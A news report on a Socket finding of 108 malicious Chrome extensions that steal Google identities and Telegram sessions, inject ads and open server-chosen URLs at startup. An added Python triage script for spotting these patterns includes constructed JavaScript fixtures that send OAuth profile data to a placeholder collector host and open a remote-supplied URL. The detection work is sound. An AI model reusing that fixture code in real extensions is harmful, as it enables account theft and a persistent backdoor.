Over 20,000 users installed malicious Chrome extensions designed to provide a backdoor, steal information, or inject ads, cybersecurity firm Socket reports.
The nefarious extensions have been published using five different accounts, namely GameGen, InterAlt, SideGames, Rodeo Games, and Yana Project, but appear to be part of a single, coordinated campaign, based on shared command-and-control (C&C) infrastructure.
Socket identified 108 extensions performing various types of malicious activities. Half of them were designed to steal Google accounts via OAuth2, and 45 were injected with a universal backdoor that opens arbitrary URLs when the browser starts.
The remaining extensions were designed to exfiltrate Telegram sessions, inject ads into YouTube and TikTok pages, inject content scripts into all visited pages, or to proxy translation requests through an attacker-controlled server.
“The 108 extensions are published across several product categories: Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and page utility extensions. Each targets a different type of user, but all share the same backend,” Socket says.
The extensions provide the expected functionality to avoid raising suspicion, but malicious code running in the background connects to the threat actor’s C&C to perform the nefarious activities.
Socket draws attention to the Telegram Multi-account extension, which steals the active Telegram Web session and allows the attackers to take over the user account by overwriting the local storage with attacker-supplied data and force-reloading Telegram.
Another extension, Web Client for Telegram – Teleside, can steal sessions and has a backdoor in the background script that allows the operators to activate a payload directly, without updating the application through the Chrome Web Store.
The 54 extensions that can steal users’ Google accounts at login contain identical code to acquire a Google OAuth2 Bearer token, use it to fetch user information, and send the data to a remote server.
“The OAuth token is used locally and never leaves the browser. What reaches the operator’s server is only a permanent identity record: the victim’s email, name, and profile picture,” Socket explains.
The background script of 45 extensions contains an identical function that, upon browser start, opens a URL received from the C&C in a new tab.
“There is no restriction on what URL the server can return. This channel survives browser restarts and operates independently of whether the user ever opens the extension,” Socket notes.
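The two background-script behaviours described above (a startup hook that opens whatever URL a remote server returns, and Google OAuth2 identity collection forwarded to a non-Google host) both leave static fingerprints in an unpacked extension: the permissions they need in `manifest.json` plus a few API calls in the background script. The following heuristic triage script is an added example written for this article, not Socket's tooling or code from any of the extensions named; the `.invalid` hosts, the fixture manifests and the background-script snippets are constructed to mimic the described patterns, and the set of "expected Google hosts" is an assumption.

```python
"""Heuristic triage of unpacked Chrome extensions for the two backend
behaviours the report describes: a startup hook that opens a URL supplied by
a remote server, and Google OAuth2 identity collection forwarded to a
non-Google host. Hypothetical helper written for this article."""
import json
import re
from pathlib import Path
from urllib.parse import urlparse

# Hosts a legitimate Google sign-in flow is expected to contact (assumption:
# any other host reached by the background script counts as "external").
GOOGLE_HOSTS = {"www.googleapis.com", "accounts.google.com",
                "oauth2.googleapis.com"}
URL_RE = re.compile(r"https?://[^\s'\"`)]+")


def background_scripts(manifest):
    """Background script paths for MV2 ("scripts") or MV3 ("service_worker")."""
    bg = manifest.get("background", {})
    if "service_worker" in bg:
        return [bg["service_worker"]]
    return list(bg.get("scripts", []))


def external_hosts(source):
    """Hostnames hard-coded in the source, minus Google's own endpoints."""
    hosts = set()
    for url in URL_RE.findall(source):
        host = urlparse(url).hostname
        if host and host not in GOOGLE_HOSTS:
            hosts.add(host)
    return hosts


def triage(manifest, files):
    """files maps script path -> source text. Returns (findings, external hosts)."""
    perms = set(manifest.get("permissions", []))
    code = "\n".join(files.get(p, "") for p in background_scripts(manifest))
    hosts = external_hosts(code)
    fetches = re.search(r"\bfetch\s*\(|XMLHttpRequest", code) is not None
    findings = []
    # Pattern 1: runs at browser start, talks to a remote host, opens a tab.
    if ("tabs" in perms and "runtime.onStartup" in code
            and re.search(r"tabs\.create\s*\(", code) and fetches and hosts):
        findings.append("startup-url-backdoor")
    # Pattern 2: obtains a Google token, reads userinfo, posts to a non-Google host.
    if ("identity" in perms and "getAuthToken" in code
            and "userinfo" in code and fetches and hosts):
        findings.append("oauth-identity-exfil")
    return findings, sorted(hosts)


def triage_unpacked(ext_dir):
    """Run triage against an unpacked extension directory on disk."""
    root = Path(ext_dir)
    manifest = json.loads((root / "manifest.json").read_text(encoding="utf-8"))
    files = {p: (root / p).read_text(encoding="utf-8", errors="replace")
             for p in background_scripts(manifest) if (root / p).is_file()}
    return triage(manifest, files)


# Constructed fixtures (not real extension code) that mimic the described patterns.
SUSPECT_MANIFEST = {"manifest_version": 3,
                    "permissions": ["tabs", "identity", "storage"],
                    "background": {"service_worker": "bg.js"}}
SUSPECT_FILES = {"bg.js": """
chrome.runtime.onStartup.addListener(async () => {
  const r = await fetch("https://c2.invalid/start");   // constructed host
  chrome.tabs.create({ url: (await r.json()).url });
});
chrome.identity.getAuthToken({ interactive: true }, (token) => {
  fetch("https://www.googleapis.com/oauth2/v3/userinfo",
        { headers: { Authorization: "Bearer " + token } })
    .then((r) => r.json())
    .then((me) => fetch("https://collector.invalid/p",   // constructed host
                        { method: "POST", body: JSON.stringify(me) }));
});
"""}
BENIGN_MANIFEST = {"manifest_version": 3, "permissions": ["storage"],
                   "background": {"service_worker": "bg.js"}}
BENIGN_FILES = {"bg.js": "chrome.runtime.onInstalled.addListener(() => "
                         "chrome.storage.local.set({ installed: true }));"}

if __name__ == "__main__":
    for name, m, f in (("suspect", SUSPECT_MANIFEST, SUSPECT_FILES),
                       ("benign", BENIGN_MANIFEST, BENIGN_FILES)):
        print(name, triage(m, f))
```

Run `triage_unpacked("/path/to/unpacked-extension")` against a copy of an installed extension's directory to get the same tuple. The heuristics are deliberately conservative (all conditions of a pattern must co-occur), so a hit is a reason to read the background script, not a verdict; obfuscated or string-built URLs will evade the regex, which is why the host list is returned alongside the findings for a manual look.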
The cybersecurity firm says it reported all the malicious extensions, but they were not immediately removed from the Chrome Web Store.